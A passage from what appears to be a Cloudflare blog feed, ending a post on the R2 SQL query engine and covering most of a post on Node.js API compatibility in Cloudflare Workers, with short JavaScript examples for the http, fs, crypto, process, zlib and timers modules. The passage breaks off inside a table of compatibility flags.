execution: processing all rows sequentially in one big batch, and processing each individual row in parallel. Sequential processing creates a so-called “tight loop”, which is usually more CPU cache friendly. In addition to that, we can significantly reduce interpretation overhead, as processing a large number of rows at a time in batches means that we go through the query plan less often. Completely parallel processing doesn’t allow us to do these things, but makes use of multiple CPU cores to finish the query faster.</p><p>DataFusion’s architecture allows us to achieve a balance on this spectrum, reaping benefits from both ends. For each data partition, we gain better CPU cache locality and amortized interpretation overhead. At the same time, since many partitions are processed in parallel, we distribute the workload across multiple CPUs, cutting the execution time further.</p>
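    <p>The balance can be pictured in plain JavaScript (standing in for DataFusion's Rust internals; the partition shapes and the filter-plus-sum "query" are invented for the example):</p>

```javascript
// Conceptual sketch only: partitions run concurrently, while the rows inside
// a partition are handled in one tight, batched loop.

function processPartition(rows) {
  // Tight loop over the whole batch: the "query" is interpreted once per
  // batch rather than once per row, amortizing interpretation overhead.
  let sum = 0;
  for (const row of rows) {
    if (row.status === 200) sum += row.bytes;
  }
  return sum;
}

async function run(partitions) {
  // Partitions are processed in parallel, spreading work across CPU cores.
  const partials = await Promise.all(
    partitions.map(async (p) => processPartition(p))
  );
  return partials.reduce((a, b) => a + b, 0);
}
```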
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/2Tis1F5C1x3x6sIyJLL8ju/aae094818b1b7f6f8d6f857305948fbd/image1.png" />
          </figure><p>In addition to the smart query execution model, DataFusion also provides first-class Parquet support.</p><p>As a file format, Parquet has multiple optimizations designed specifically for query engines. Parquet is a column-based format, meaning that each column is physically separated from the others. This separation enables better compression ratios, but it also allows the query engine to read columns selectively. If the query only ever uses five columns, we can read just those five and skip the remaining fifty. This massively reduces the amount of data we need to read from R2 and the CPU time spent on decompression.</p><p>DataFusion does exactly that. Using R2 ranged reads, it reads the parts of the Parquet files containing the requested columns, skipping the rest.</p><p>DataFusion’s optimizer also allows us to push down filters to the lowest levels of the query plan. In other words, we can apply filters right as we are reading values from Parquet files. This lets us skip materializing results we know for sure won’t be returned to the user, cutting the query execution time further.</p>
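    <p>To make the column skipping concrete, here is a toy model of turning per-column byte ranges (which Parquet keeps in its footer metadata) into HTTP range reads. The metadata layout shown is heavily simplified and hypothetical:</p>

```javascript
// Toy model of selective column reads. Real Parquet footers are far more
// involved; this only shows why unused columns cost nothing to fetch.

const rowGroupMeta = {
  columns: {
    timestamp: { offset: 0, length: 4096 },
    status: { offset: 4096, length: 1024 },
    url: { offset: 5120, length: 65536 }, // skipped unless projected
  },
};

// Build one HTTP Range header value per projected column.
function rangesFor(meta, projectedColumns) {
  return projectedColumns.map((name) => {
    const { offset, length } = meta.columns[name];
    return `bytes=${offset}-${offset + length - 1}`;
  });
}

const ranges = rangesFor(rowGroupMeta, ['timestamp', 'status']);
// Each entry becomes one ranged GET against R2, e.g.
//   fetch(objectUrl, { headers: { Range: ranges[0] } })
```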
    <div>
      <h3>Returning query results</h3>
    </div>
    <p>Once a query worker finishes computing results, it returns them to the coordinator through <a href="https://grpc.io/"><u>the gRPC protocol</u></a>.</p><p>R2 SQL uses <a href="https://arrow.apache.org/"><u>Apache Arrow</u></a> for the internal representation of query results. Arrow is an in-memory format that efficiently represents arrays of structured data. It is also used by DataFusion during query execution to represent partitions of data.</p><p>In addition to being an in-memory format, Arrow also defines the <a href="https://arrow.apache.org/docs/format/Columnar.html#format-ipc"><u>Arrow IPC</u></a> serialization format. Arrow IPC isn’t designed for long-term storage of data, but for inter-process communication, which is exactly what query workers and the coordinator do over the network. The query worker serializes all of its results into the Arrow IPC format and embeds them in the gRPC response. The coordinator in turn deserializes the results and resumes working with Arrow arrays.</p>
    <div>
      <h2>Future plans</h2>
    </div>
    <p>While R2 SQL is currently quite good at executing filter queries, we also plan to rapidly add new capabilities over the coming months. This includes, but is not limited to, adding:</p><ul><li><p>Support for complex aggregations in a distributed and scalable fashion;</p></li><li><p>Tools that provide visibility into query execution, helping developers improve performance;</p></li><li><p>Support for many of the configuration options Apache Iceberg supports.</p></li></ul><p>In addition to that, we plan to improve the developer experience by allowing users to query their R2 Data Catalogs using R2 SQL from the Cloudflare Dashboard.</p><p>Given Cloudflare’s distributed compute, network capabilities, and ecosystem of developer tools, we have the opportunity to build something truly unique here. We are exploring different kinds of indexes to make R2 SQL queries even faster and to provide more functionality, such as full text search, geospatial queries, and more.</p>
    <div>
      <h2>Try it now!</h2>
    </div>
    <p>It’s early days for R2 SQL, but we’re excited for users to get their hands on it. R2 SQL is available in open beta today! Head over to our<a href="https://developers.cloudflare.com/r2-sql/get-started/"> <u>getting started guide</u></a> to learn how to create an end-to-end data pipeline that processes and delivers events to an R2 Data Catalog table, which can then be queried with R2 SQL.</p><p>
We’re excited to see what you build! Come share your feedback with us on our<a href="http://discord.cloudflare.com/"> <u>Developer Discord</u></a>.</p> ]]></content:encoded>
            <category><![CDATA[R2]]></category>
            <category><![CDATA[Birthday Week]]></category>
            <category><![CDATA[Data]]></category>
            <category><![CDATA[Deep Dive]]></category>
            <category><![CDATA[Edge Computing]]></category>
            <category><![CDATA[Rust]]></category>
            <category><![CDATA[Serverless]]></category>
            <category><![CDATA[SQL]]></category>
            <guid isPermaLink="false">7znvjodLkg1AxYlR992it2</guid>
            <dc:creator>Yevgen Safronov</dc:creator>
            <dc:creator>Nikita Lapkov</dc:creator>
            <dc:creator>Jérôme Schneider</dc:creator>
        </item>
        <item>
            <title><![CDATA[A year of improving Node.js compatibility in Cloudflare Workers]]></title>
            <link>https://blog.cloudflare.com/nodejs-workers-2025/</link>
            <pubDate>Thu, 25 Sep 2025 13:00:00 GMT</pubDate>
            <description><![CDATA[ Over the year we have greatly expanded Node.js compatibility. There are hundreds of new Node.js APIs now available that make it easier to run existing Node.js code on our platform. ]]></description>
            <content:encoded><![CDATA[ <p>We've been busy.</p><p>Compatibility with the broad JavaScript developer ecosystem has always been a key strategic investment for us. We believe in open standards and an open web. We want you to see <a href="https://workers.cloudflare.com/"><u>Workers</u></a> as a powerful extension of your development platform with the ability to just drop code in that Just Works. To deliver on this goal, the Cloudflare Workers team has spent the past year significantly expanding compatibility with the Node.js ecosystem, enabling hundreds (if not thousands) of popular <a href="https://npmjs.com"><u>npm</u></a> modules to now work seamlessly, including the ever popular <a href="https://expressjs.com"><u>express</u></a> framework.</p><p>We have implemented a <a href="https://developers.cloudflare.com/workers/runtime-apis/nodejs/"><u>substantial subset of the Node.js standard library</u></a>, focusing on the most commonly used, and asked for, APIs. These include:</p>
<div><table><colgroup>
<col></col>
<col></col>
</colgroup>
<thead>
  <tr>
    <th><span>Module</span></th>
    <th><span>API documentation</span></th>
  </tr></thead>
<tbody>
  <tr>
    <td><span>node:console</span></td>
    <td><a href="https://nodejs.org/docs/latest/api/console.html"><span>https://nodejs.org/docs/latest/api/console.html</span></a><span> </span></td>
  </tr>
  <tr>
    <td><span>node:crypto</span></td>
    <td><a href="https://nodejs.org/docs/latest/api/crypto.html"><span>https://nodejs.org/docs/latest/api/crypto.html</span></a><span> </span></td>
  </tr>
  <tr>
    <td><span>node:dns</span></td>
    <td><a href="https://nodejs.org/docs/latest/api/dns.html"><span>https://nodejs.org/docs/latest/api/dns.html</span></a><span> </span></td>
  </tr>
  <tr>
    <td><span>node:fs</span></td>
    <td><a href="https://nodejs.org/docs/latest/api/fs.html"><span>https://nodejs.org/docs/latest/api/fs.html</span></a><span> </span></td>
  </tr>
  <tr>
    <td><span>node:http</span></td>
    <td><a href="https://nodejs.org/docs/latest/api/http.html"><span>https://nodejs.org/docs/latest/api/http.html</span></a><span> </span></td>
  </tr>
  <tr>
    <td><span>node:https</span></td>
    <td><a href="https://nodejs.org/docs/latest/api/https.html"><span>https://nodejs.org/docs/latest/api/https.html</span></a><span> </span></td>
  </tr>
  <tr>
    <td><span>node:net</span></td>
    <td><a href="https://nodejs.org/docs/latest/api/net.html"><span>https://nodejs.org/docs/latest/api/net.html</span></a><span> </span></td>
  </tr>
  <tr>
    <td><span>node:process</span></td>
    <td><a href="https://nodejs.org/docs/latest/api/process.html"><span>https://nodejs.org/docs/latest/api/process.html</span></a><span> </span></td>
  </tr>
  <tr>
    <td><span>node:timers</span></td>
    <td><a href="https://nodejs.org/docs/latest/api/timers.html"><span>https://nodejs.org/docs/latest/api/timers.html</span></a><span> </span></td>
  </tr>
  <tr>
    <td><span>node:tls</span></td>
    <td><a href="https://nodejs.org/docs/latest/api/tls.html"><span>https://nodejs.org/docs/latest/api/tls.html</span></a><span> </span></td>
  </tr>
  <tr>
    <td><span>node:zlib</span></td>
    <td><a href="https://nodejs.org/docs/latest/api/zlib.html"><span>https://nodejs.org/docs/latest/api/zlib.html</span></a><span> </span></td>
  </tr>
</tbody></table></div><p>Each of these has been carefully implemented to approximate Node.js' behavior as closely as feasible. Where matching <a href="http://nodejs.org"><u>Node.js</u></a>' behavior is not possible, our implementations will throw a clear error when called, rather than silently failing or not being present at all. This ensures that packages that check for the presence of these APIs will not break, even if the functionality is not available.</p><p>In some cases, we had to implement entirely new capabilities within the runtime in order to provide the necessary functionality. For <code>node:fs</code>, we added a new virtual file system within the Workers environment. In other cases, such as with <code>node:net</code>, <code>node:tls</code>, and <code>node:http</code>, we wrapped the new Node.js APIs around existing Workers capabilities such as the <a href="https://developers.cloudflare.com/workers/runtime-apis/tcp-sockets/"><u>Sockets API</u></a> and <a href="https://developers.cloudflare.com/workers/runtime-apis/fetch/"><code><u>fetch</u></code></a>.</p><p>Most importantly, <b>all of these implementations are done natively in the Workers runtime</b>, using a combination of TypeScript and C++. Whereas our earlier Node.js compatibility efforts relied heavily on polyfills and shims injected at deployment time by developer tooling such as <a href="https://developers.cloudflare.com/workers/wrangler/"><u>Wrangler</u></a>, we are moving towards a model where future Workers will have these APIs available natively, without the need for any additional dependencies. This not only improves performance and reduces memory usage, but also ensures that the behavior is as close to Node.js as possible.</p>
    <div>
      <h2>The networking stack</h2>
    </div>
    <p>Node.js has a rich set of networking APIs that allow applications to create servers, make HTTP requests, work with raw TCP and UDP sockets, send DNS queries, and more. Workers do not have direct access to raw kernel-level sockets, though. So how can we support these Node.js APIs in a way that still lets packages work as intended? We decided to build on top of the existing <a href="https://developers.cloudflare.com/workers/runtime-apis/tcp-sockets/"><u>managed Sockets</u></a> and fetch APIs. These implementations allow many popular Node.js packages that rely on networking APIs to work seamlessly in the Workers environment.</p><p>Let's start with the HTTP APIs.</p>
    <div>
      <h3>HTTP client and server support</h3>
    </div>
    <p>From the moment we announced that we would be pursuing Node.js compatibility within Workers, users have been asking specifically for an implementation of the <code>node:http</code> module. There are countless modules in the ecosystem that depend directly on APIs like <code>http.get(...)</code> and <code>http.createServer(...)</code>.</p><p>The <code>node:http</code> and <code>node:https</code> modules provide APIs for creating HTTP clients and servers. <a href="https://blog.cloudflare.com/bringing-node-js-http-servers-to-cloudflare-workers/"><u>We have implemented both</u></a>, allowing you to create HTTP clients using <code>http.request()</code> and servers using <code>http.createServer()</code>. <a href="https://developers.cloudflare.com/workers/runtime-apis/nodejs/http/"><u>The HTTP client implementation</u></a> is built on top of the Fetch API, while the HTTP server implementation is built on top of the Workers runtime’s existing request handling capabilities.</p><p>The client side is fairly straightforward:</p>
            <pre><code>import http from 'node:http';

export default {
  async fetch(request) {
    return new Promise((resolve, reject) =&gt; {
      const req = http.request('http://example.com', (res) =&gt; {
        let data = '';
        res.setEncoding('utf8');
        res.on('data', (chunk) =&gt; {
          data += chunk;
        });
        res.on('end', () =&gt; {
          resolve(new Response(data));
        });
      });
      req.on('error', (err) =&gt; {
        reject(err);
      });
      req.end();
    });
  }
}
</code></pre>
            <p>The server side is just as simple but likely even more exciting. We've often been asked about the possibility of supporting <a href="https://expressjs.com/"><u>Express</u></a>, <a href="https://koajs.com/"><u>Koa</u></a>, or <a href="https://fastify.dev/"><u>Fastify</u></a> within Workers, but it was difficult to do because these frameworks depend so heavily on Node.js APIs. With the new additions it is now possible to use both Express and Koa within Workers, and we're hoping to add Fastify support later.</p>
            <pre><code>import { createServer } from "node:http";
import { httpServerHandler } from "cloudflare:node";

const server = createServer((req, res) =&gt; {
  res.writeHead(200, { "Content-Type": "text/plain" });
  res.end("Hello from Node.js HTTP server!");
});

export default httpServerHandler(server);
</code></pre>
            <p>The <code>httpServerHandler()</code> function from the <code>cloudflare:node</code> module integrates the HTTP <code>server</code> with the Workers fetch event, allowing it to handle incoming requests.</p>
    <div>
      <h3>The <code>node:dns</code> module</h3>
    </div>
    <p>The <code>node:dns</code> module provides an API for performing DNS queries. </p><p>At Cloudflare, we happen to have a <a href="https://developers.cloudflare.com/1.1.1.1/encryption/dns-over-https/"><u>DNS-over-HTTPS (DoH)</u></a> service and our own <a href="https://one.one.one.one/"><u>DNS service called 1.1.1.1</u></a>. We took advantage of this when exposing <code>node:dns</code> in Workers. When you use this module to perform a query, it will just make a subrequest to 1.1.1.1 to resolve the query. This way the user doesn’t have to think about DNS servers, and the query will just work.</p>
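    <p>The API shape is the same as in Node.js; only the resolver behind it differs. A minimal sketch (the <code>lookup</code> wrapper is just for illustration):</p>

```javascript
import dns from 'node:dns';

// Resolve the A records for a hostname. In Workers this is answered by a
// DoH subrequest to 1.1.1.1; in Node.js it goes through the OS resolver.
async function lookup(hostname) {
  return dns.promises.resolve4(hostname);
}

// e.g. const addresses = await lookup('example.com');
```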
    <div>
      <h3>The <code>node:net</code> and <code>node:tls</code> modules</h3>
    </div>
    <p>The <code>node:net</code> module provides an API for creating TCP sockets, while the <code>node:tls</code> module provides an API for creating secure TLS sockets. As we mentioned before, both are built on top of the existing <a href="https://developers.cloudflare.com/workers/runtime-apis/tcp-sockets/"><u>Workers Sockets API</u></a>. Note that not all features of the <code>node:net</code> and <code>node:tls</code> modules are available in Workers. For instance, it is not yet possible to create a TCP server using <code>net.createServer()</code> (but maybe soon!), but we have implemented enough of the APIs to allow many popular packages that rely on these modules to work in Workers.</p>
            <pre><code>import net from 'node:net';
import tls from 'node:tls';

export default {
  async fetch(request) {
    const { promise, resolve } = Promise.withResolvers();
    const socket = net.connect({ host: 'example.com', port: 80 },
        () =&gt; {
      let buf = '';
      socket.setEncoding('utf8');
      socket.on('data', (chunk) =&gt; buf += chunk);
      socket.on('end', () =&gt; resolve(new Response('ok')));
      socket.end();
    });
    return promise;
  }
}
</code></pre>
            
    <div>
      <h2>A new virtual file system and the <code>node:fs</code> module</h2>
    </div>
    <p>What does supporting filesystem APIs mean in a serverless environment? When you deploy a Worker, it runs in Region:Earth, and we don’t want you to have to think about individual servers with individual file systems. There are, however, countless existing applications and modules in the ecosystem that leverage the file system to store configuration data, read and write temporary data, and more.</p><p>Workers do not have access to a traditional file system like a Node.js process does, and for good reason! A Worker does not run on a single machine; a single request to one worker can run on any one of thousands of servers anywhere in Cloudflare's global <a href="https://www.cloudflare.com/network"><u>network</u></a>. Coordinating and synchronizing access to shared physical resources such as a traditional file system harbors major technical challenges and risks of deadlocks and more, challenges that are inherent in any massively distributed system. Fortunately, Workers provide powerful tools like <a href="https://developers.cloudflare.com/durable-objects/"><u>Durable Objects</u></a> that provide a solution for coordinating access to shared, durable state at scale. To address the need for a file system in Workers, we built on what already makes Workers great.</p><p>We implemented a virtual file system that allows you to use the <code>node:fs</code> APIs to read and write temporary, in-memory files. This virtual file system is specific to each Worker. When using a stateless worker, files created in one request are not accessible in any other request. However, when using a Durable Object, this temporary file space can be shared across multiple requests from multiple users.
This file system is ephemeral (for now), meaning that files are not persisted across Worker restarts or deployments, so it does not replace the use of the <a href="https://developers.cloudflare.com/durable-objects/api/storage-api/"><u>Durable Object Storage</u></a> mechanism, but it provides a powerful new tool that greatly expands the capabilities of your Durable Objects.</p><p>The <code>node:fs</code> module provides a rich set of APIs for working with files and directories:</p>
            <pre><code>import fs from 'node:fs';

export default {
  async fetch(request) {
    // Write a temporary file
    await fs.promises.writeFile('/tmp/hello.txt', 'Hello, world!');

    // Read the file
    const data = await fs.promises.readFile('/tmp/hello.txt', 'utf-8');

    return new Response(`File contents: ${data}`);
  }
}
</code></pre>
            <p>The virtual file system supports a wide range of file operations, including reading and writing files, creating and removing directories, and working with file descriptors. It also supports standard input/output/error streams via <code>process.stdin</code>, <code>process.stdout</code>, and <code>process.stderr</code>, as well as symbolic links, streams, and more.</p><p>While the current implementation of the virtual file system is in-memory only, we are exploring options for adding persistent storage in the future that would link to existing Cloudflare storage solutions like <a href="https://www.cloudflare.com/developer-platform/products/r2/">R2</a> or Durable Objects. But you don't have to wait on us! When combined with powerful tools like Durable Objects and <a href="https://developers.cloudflare.com/workers/runtime-apis/rpc/"><u>JavaScript RPC</u></a>, it's certainly possible to create your own general-purpose, durable file system abstraction backed by SQLite storage.</p>
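    <p>A few of those operations together: directories, symbolic links, and reads through them. The same calls work against Node.js' on-disk file system, which is how this snippet can be tried locally; in a Worker the paths live in the in-memory virtual file system instead:</p>

```javascript
import fs from 'node:fs';
import os from 'node:os';
import path from 'node:path';

// Create a scratch directory, write a file, point a symlink at it, and
// read the file back through the link.
const dir = fs.mkdtempSync(path.join(os.tmpdir(), 'vfs-demo-'));
fs.writeFileSync(path.join(dir, 'config.json'), '{"retries":3}');
fs.symlinkSync(path.join(dir, 'config.json'), path.join(dir, 'latest.json'));

const entries = fs.readdirSync(dir).sort(); // ['config.json', 'latest.json']
const config = JSON.parse(
  fs.readFileSync(path.join(dir, 'latest.json'), 'utf8')
); // { retries: 3 }
```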
    <div>
      <h2>Cryptography with <code>node:crypto</code></h2>
    </div>
    <p>The <code>node:crypto</code> module provides a comprehensive set of cryptographic functionality, including hashing, encryption, decryption, and more. We have implemented a full version of the <code>node:crypto</code> module, allowing you to use familiar cryptographic APIs in your Workers applications. There will be some differences in behavior compared to Node.js due to the fact that Workers uses <a href="https://github.com/google/boringssl/blob/main/README.md"><u>BoringSSL</u></a> under the hood, while Node.js uses <a href="https://github.com/openssl"><u>OpenSSL</u></a>. However, we have strived to make the APIs as compatible as possible, and many popular packages that rely on <code>node:crypto</code> now work seamlessly in Workers.</p><p>To accomplish this, we didn't just copy the implementation of these cryptographic operations from Node.js. Rather, we worked within the Node.js project to extract the core crypto functionality into a separate dependency project called <a href="https://github.com/nodejs/ncrypto"><code><u>ncrypto</u></code></a> that is used not only by Workers but by Bun as well, implementing Node.js-compatible functionality by simply running the exact same code that Node.js runs.</p>
            <pre><code>import crypto from 'node:crypto';

export default {
  async fetch(request) {
    const hash = crypto.createHash('sha256');
    hash.update('Hello, world!');
    const digest = hash.digest('hex');

    return new Response(`SHA-256 hash: ${digest}`);
  }
}
</code></pre>
            <p>All major capabilities of the <code>node:crypto</code> module are supported, including:</p><ul><li><p>Hashing (e.g., SHA-256, SHA-512)</p></li><li><p>HMAC</p></li><li><p>Symmetric encryption/decryption</p></li><li><p>Asymmetric encryption/decryption</p></li><li><p>Digital signatures</p></li><li><p>Key generation and management</p></li><li><p>Random byte generation</p></li><li><p>Key derivation functions (e.g., PBKDF2, scrypt)</p></li><li><p>Cipher and Decipher streams</p></li><li><p>Sign and Verify streams</p></li><li><p>KeyObject class for managing keys</p></li><li><p>Certificate handling (e.g., X.509 certificates)</p></li><li><p>Support for various encoding formats (e.g., PEM, DER, base64)</p></li><li><p>and more…</p></li></ul>
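    <p>For instance, HMAC uses the same <code>createHmac</code> API as Node.js. The expected digest below is the published RFC 4231 test vector for HMAC-SHA-256, so the same code yields the same result in Node.js and in Workers:</p>

```javascript
import crypto from 'node:crypto';

// HMAC-SHA-256 using the inputs from RFC 4231, test case 2.
const hmac = crypto.createHmac('sha256', 'Jefe');
hmac.update('what do ya want for nothing?');
const digest = hmac.digest('hex');
// → '5bdcc146bf60754e6a042426089575c75a003f089d2739839dec58b964ec3843'
```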
    <div>
      <h2>Process &amp; Environment</h2>
    </div>
    <p>In Node.js, the <code>node:process</code> module provides a global object that gives information about, and control over, the current Node.js process. It includes properties and methods for accessing environment variables, command-line arguments, the current working directory, and more. It is one of the most fundamental modules in Node.js, and many packages rely on it for basic functionality and simply assume its presence. There are, however, some aspects of the <code>node:process</code> module that do not make sense in the Workers environment, such as process IDs and user/group IDs which are tied to the operating system and process model of a traditional server environment and have no equivalent in the Workers environment.</p><p>When <code>nodejs_compat</code> is enabled, the <code>process</code> global will be available in your Worker scripts or you can import it directly via <code>import process from 'node:process'</code>. Note that the <code>process</code> global is only available when the <code>nodejs_compat</code> flag is enabled. If you try to access <code>process</code> without the flag, it will be <code>undefined</code> and the import will throw an error.</p><p>Let's take a look at the <code>process</code> APIs that do make sense in Workers, and that have been fully implemented, starting with <code>process.env</code>.</p>
    <div>
      <h3>Environment variables</h3>
    </div>
    <p>Workers have had <a href="https://developers.cloudflare.com/workers/configuration/environment-variables/"><u>support for environment variables</u></a> for a while now, but previously they were only accessible via the env argument passed to the Worker function. Accessing the environment at the top-level of a Worker was not possible:</p>
            <pre><code>export default {
  async fetch(request, env) {
    const config = env.MY_ENVIRONMENT_VARIABLE;
    // ...
  }
}
</code></pre>
            <p> With the <a href="https://developers.cloudflare.com/workers/configuration/environment-variables/"><code><u>new process.env</u></code><u> implementation</u></a>, you can now access environment variables in a more familiar way, just like in Node.js, and at any scope, including the top-level of your Worker:</p>
            <pre><code>import process from 'node:process';
const config = process.env.MY_ENVIRONMENT_VARIABLE;

export default {
  async fetch(request, env) {
    // You can still access env here if you need to
    const configFromEnv = env.MY_ENVIRONMENT_VARIABLE;
    // ...
  }
}
</code></pre>
            <p><a href="https://developers.cloudflare.com/workers/configuration/environment-variables/"><u>Environment variables</u></a> are set in the same way as before, via the <code>wrangler.toml</code> or <code>wrangler.jsonc</code> configuration file, or via the Cloudflare dashboard or API. They may be set as simple key-value pairs or as JSON objects:</p>
            <pre><code>{
  "name": "my-worker-dev",
  "main": "src/index.js",
  "compatibility_date": "2025-09-15",
  "compatibility_flags": [
    "nodejs_compat"
  ],
  "vars": {
    "API_HOST": "example.com",
    "API_ACCOUNT_ID": "example_user",
    "SERVICE_X_DATA": {
      "URL": "service-x-api.dev.example",
      "MY_ID": 123
    }
  }
}
</code></pre>
            <p>When accessed via <code>process.env</code>, all environment variable values are strings, just like in Node.js.</p><p>Because <code>process.env</code> is accessible at the global scope, it is important to note that environment variables are accessible from anywhere in your Worker script, including third-party libraries that you may be using. This is consistent with Node.js behavior, but it is something to be aware of from a security and configuration management perspective. The <a href="https://developers.cloudflare.com/secrets-store/"><u>Cloudflare Secrets Store</u></a> can provide enhanced handling around secrets within Workers as an alternative to using environment variables.</p>
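    <p>That "everything is a string" rule matters for JSON-valued vars like <code>SERVICE_X_DATA</code> above: they come back as JSON text and need parsing. A small illustration (the assignments stand in for values that wrangler configuration would normally provide):</p>

```javascript
import process from 'node:process';

// These assignments stand in for vars set via wrangler configuration; in a
// real Worker they would already be present on process.env.
process.env.API_PORT = 8080; // assigning a number coerces it to a string
process.env.SERVICE_X_DATA = '{"URL":"service-x-api.dev.example","MY_ID":123}';

const port = Number(process.env.API_PORT); // back to a number
const serviceX = JSON.parse(process.env.SERVICE_X_DATA); // back to an object
```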
    <div>
      <h4>Importable environment and waitUntil</h4>
    </div>
    <p>We decided to go a step further and make it possible, even without the <code>nodejs_compat</code> flag, to import both the environment and the <a href="https://developers.cloudflare.com/workers/configuration/environment-variables/"><u>waitUntil mechanism</u></a> as a module, rather than forcing users to always access them via the <code>env</code> and <code>ctx</code> arguments passed to the Worker function. This can make it easier to access the environment in a more modular way, and can help to avoid passing the <code>env</code> argument through multiple layers of function calls. This is not a Node.js-compatibility feature, but we believe it is a useful addition to the Workers environment:</p>
            <pre><code>import { env, waitUntil } from 'cloudflare:workers';

const config = env.MY_ENVIRONMENT_VARIABLE;

export default {
  async fetch(request) {
    // You can still access env here if you need to
    const configFromEnv = env.MY_ENVIRONMENT_VARIABLE;
    // ...
  }
}

function doSomething() {
  // Bindings and waitUntil can now be accessed without
  // passing the env and ctx through every function call.
  waitUntil(env.RPC.doSomethingRemote());
}
</code></pre>
            <p>One important note about <code>process.env</code>: changes to environment variables via <code>process.env</code> will not be reflected in the <code>env</code> argument passed to the Worker function, and vice versa. <code>process.env</code> is populated at the start of the Worker execution and is not updated dynamically. This is consistent with Node.js behavior, where changes to <code>process.env</code> do not affect the actual environment variables of the running process. We did this to minimize the risk that a third-party library, originally meant to run in Node.js, could inadvertently modify the environment assumed by the rest of the Worker code.</p>
    <div>
      <h3>Stdin, stdout, stderr</h3>
    </div>
    <p>Workers do not have traditional standard input/output/error streams like a Node.js process does. However, we have implemented <code>process.stdin</code>, <code>process.stdout</code>, and <code>process.stderr</code> as stream-like objects that can be used similarly. These streams are not connected to an actual process's stdin and stdout, but anything written to them is captured in the same way as <code>console.log</code> and friends, and, just like them, will show up in <a href="https://developers.cloudflare.com/workers/observability/logs/workers-logs/"><u>Workers Logs</u></a>.</p><p><code>process.stdout</code> and <code>process.stderr</code> are Node.js writable streams:</p>
            <pre><code>import process from 'node:process';

export default {
  async fetch(request) {
    process.stdout.write('This will appear in the Worker logs\n');
    process.stderr.write('This will also appear in the Worker logs\n');
    return new Response('Hello, world!');
  }
}
</code></pre>
            <p>Support for <code>stdin</code>, <code>stdout</code>, and <code>stderr</code> is also integrated with the virtual file system, allowing you to write to the standard file descriptors <code>0</code>, <code>1</code>, and <code>2</code> (representing <code>stdin</code>, <code>stdout</code>, and <code>stderr</code> respectively) using the <code>node:fs</code> APIs:</p>
            <pre><code>import fs from 'node:fs';
import process from 'node:process';

export default {
  async fetch(request) {
    // Write to stdout
    fs.writeSync(process.stdout.fd, 'Hello, stdout!\n');
    // Write to stderr
    fs.writeSync(process.stderr.fd, 'Hello, stderr!\n');

    return new Response('Check the logs for stdout and stderr output!');
  }
}
</code></pre>
            
    <div>
      <h3>Other process APIs</h3>
      <a href="#other-process-apis">
        
      </a>
    </div>
<p>We cannot cover every <code>node:process</code> API in detail here, but here are some of the other notable APIs that we have implemented:</p><ul><li><p><code>process.nextTick(fn)</code>: Schedules a callback to be invoked after the current execution context completes. Our implementation uses the same microtask queue as promises, so it behaves exactly the same as <code>queueMicrotask(fn)</code>.</p></li><li><p><code>process.cwd()</code> and <code>process.chdir()</code>: Get and change the current virtual working directory. The current working directory is initialized to <code>/bundle</code> when the Worker starts, and every request has its own isolated view of the current working directory. Changing the working directory in one request does not affect the working directory in other requests.</p></li><li><p><code>process.exit()</code>: Immediately terminates the current Worker request execution. This is unlike Node.js, where <code>process.exit()</code> terminates the entire process. In Workers, calling <code>process.exit()</code> will stop execution of the current request and return an error response to the client.</p></li></ul>
    <div>
      <h2>Compression with <code>node:zlib</code></h2>
      <a href="#compression-with-node-zlib">
        
      </a>
    </div>
    <p>The <code>node:zlib</code> module provides APIs for compressing and decompressing data using various algorithms such as gzip, deflate, and brotli. We have implemented the <code>node:zlib</code> module, allowing you to use familiar compression APIs in your Workers applications. This enables a wide range of use cases, including data compression for network transmission, response optimization, and archive handling.</p>
            <pre><code>import zlib from 'node:zlib';

export default {
  async fetch(request) {
    const input = 'Hello, world! Hello, world! Hello, world!';
    const compressed = zlib.gzipSync(input);
    const decompressed = zlib.gunzipSync(compressed).toString('utf-8');

    return new Response(`Decompressed data: ${decompressed}`);
  }
}
</code></pre>
<p>While Workers has had built-in support for gzip and deflate compression via the <a href="https://compression.spec.whatwg.org/"><u>Web Platform Standard Compression API</u></a>, the <code>node:zlib</code> module adds support for the Brotli compression algorithm, as well as a more familiar API for Node.js developers.</p>
    <div>
      <h2>Timing &amp; scheduling</h2>
      <a href="#timing-scheduling">
        
      </a>
    </div>
    <p>Node.js provides a set of timing and scheduling APIs via the <code>node:timers</code> module. We have implemented these in the runtime as well.</p>
            <pre><code>import timers from 'node:timers';

export default {
  async fetch(request) {
    timers.setInterval(() =&gt; {
      console.log('This will log every half-second');
    }, 500);

    timers.setImmediate(() =&gt; {
      console.log('This will log immediately after the current event loop');
    });

    return new Promise((resolve) =&gt; {
      timers.setTimeout(() =&gt; {
        resolve(new Response('Hello after 1 second!'));
      }, 1000);
    });
  }
}
</code></pre>
<p>The Node.js implementations of the timers APIs are very similar to the standard Web Platform APIs, with one key difference: the Node.js timers APIs return <code>Timeout</code> objects that can be used to manage the timers after they have been created. We have implemented the <code>Timeout</code> class in Workers to provide this functionality, allowing you to clear or refresh timers as needed.</p>
    <div>
      <h2>Console</h2>
      <a href="#console">
        
      </a>
    </div>
    <p>The <code>node:console</code> module provides a set of console logging APIs that are similar to the standard <code>console</code> global, but with some additional features. We have implemented the <code>node:console</code> module as a thin wrapper around the existing <code>globalThis.console</code> that is already available in Workers.</p>
    <div>
      <h2>How to enable the Node.js compatibility features</h2>
      <a href="#how-to-enable-the-node-js-compatibility-features">
        
      </a>
    </div>
<p>To enable the Node.js compatibility features as a whole within your Workers, you can set the <code>nodejs_compat</code> <a href="https://developers.cloudflare.com/workers/configuration/compatibility-flags/"><u>compatibility flag</u></a> in your <a href="https://developers.cloudflare.com/workers/wrangler/configuration/"><u><code>wrangler.jsonc</code> or <code>wrangler.toml</code></u></a> configuration file. If you are not using Wrangler, you can also set the flag via the <a href="https://dash.cloudflare.com"><u>Cloudflare dashboard</u></a> or API:</p>
            <pre><code>{
  "name": "my-worker",
  "main": "src/index.js",
  "compatibility_date": "2025-09-21",
  "compatibility_flags": [
    // Get everything Node.js compatibility related
    "nodejs_compat",
  ]
}
</code></pre>
            <p><b>The compatibility date here is key! Update that to the most current date, and you'll always be able to take advantage of the latest and greatest features.</b></p><p>The <code>nodejs_compat</code> flag is an umbrella flag that enables all the Node.js compatibility features at once. This is the recommended way to enable Node.js compatibility, as it ensures that all features are available and work together seamlessly. However, if you prefer, you can also enable or disable some features individually via their own compatibility flags:</p>
<div><table><thead>
  <tr>
    <th><span>Module</span></th>
    <th><span>Enable Flag (default)</span></th>
    <th><span>Disable Flag</span></th>
  </tr></thead>
<tbody>
  <tr>
